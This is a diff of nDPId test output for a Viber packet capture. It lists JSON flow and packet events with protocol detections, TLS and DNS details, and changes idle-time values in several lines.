+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155671066,"flow_last_seen":1527155671066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155671066,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1527155671240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155671240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0FZBAAEAG0gnAqAARNrtbtr+YAbtog5WtghP4IoAQAq0cfAAAAQEICgAhgE8sBh44"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155671066,"flow_last_seen":1527155671250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155671250,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":278,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1629,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01266{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":281,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155671066,"flow_last_seen":1527155671423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5054,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155671423,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"brahe.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679410,"flow_last_seen":1527155679410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155679410,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1527155679410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679410,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8V2ZAAEAGC9HAqAAREskEA4PQAbvgGt8vAAAAAKAC\/\/+jOgAAAgQFtAQCCAoAIYhJAAAAAAEDAwc="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1527155679411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155679411,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdf+NAAEAR4d\/AqAAREskEA5UuHzEBCY\/LBbgBAAUANRj1GJhk5EcHridUEQCowC6VMgAAAEMBABABAPdbkpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAGwkdkSv31AWZshbdezAt4SmQgEbXQ8gpESKVZEPm+yytcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6SNCb6pEPHTLEjikG3nU2iKPCm3mBiaaSkNyyVaokw3bFWKZLztddqHjISoa\/0AQVn24h8Bz7MKBuS1UkASdYsAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} 00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155679411,"flow_last_seen":1527155679411,"flow_idle_time":180000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155679411,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} @@ -122,8 +122,8 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAuf+VAAEAR4szAqAAREskEA5UuHzEAGscOBbgRAAEAAAAuCDgEAAAHridU"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1527155679413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679413,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwf+ZAAEAR4snAqAAREskEA5UuHzEAHM1MBbgJAPtbkpFjAQAANRj1GJhk5Ec="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwpnZAACsR0cESyQQDwKgAER8zlS4AHM86BbgaADUY9RiYZORHMkN8Xi6VAMg="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeDcSyQQDwKgAEQG7g9B0pK754BrfMKASaN\/EGgAAAgQFtAQCCAoA5FGtACGISQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1527155679443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155679443,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeDcSyQQDwKgAEQG7g9B0pK754BrfMKASaN\/EGgAAAgQFtAQCCAoA5FGtACGISQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1527155679444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155679444,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0V2dAAEAGC9jAqAAREskEA4PQAbvgGt8wdKSu+oAQAq1ZEAAAAQEICgAhiFIA5FGt"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1527155685529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155685529,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8KqJAAEARjp7AqAARwKgAD8OxADUAKKNciEIBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685529,"flow_last_seen":1527155685529,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155685529,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -133,34 +133,34 @@ 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"AA6OMNv9MAdNo1+nCABFAAXcfu9AAEABNMHAqAARwKgADwgA3UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155685757,"flow_last_seen":1527155685757,"flow_idle_time":120000,"flow_min_l4_payload_len":1480,"flow_max_l4_payload_len":1480,"flow_tot_l4_payload_len":1480,"flow_avg_l4_payload_len":1480,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.196204} 02402{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1527155685757,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1527155685757,"pkt":"MAdNo1+nAA6OMNv9CABFAAXcOTwAAEABunTAqAAPwKgAEQAA5UOrGAABMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWl9fMTIzNDU2Nzg5MEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaX18xMjM0NTY3ODkwQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpfXzEyMzQ1Njc4OTBBQkNERUZHSElKS0xNTk9QUVI="} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1527155639240,"flow_last_seen":1527155640252,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6393,"flow_avg_l4_payload_len":290,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1527155640085,"flow_last_seen":1527155641008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6145,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1527155644240,"flow_last_seen":1527155644244,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1527155670640,"flow_last_seen":1527155677861,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":5405,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 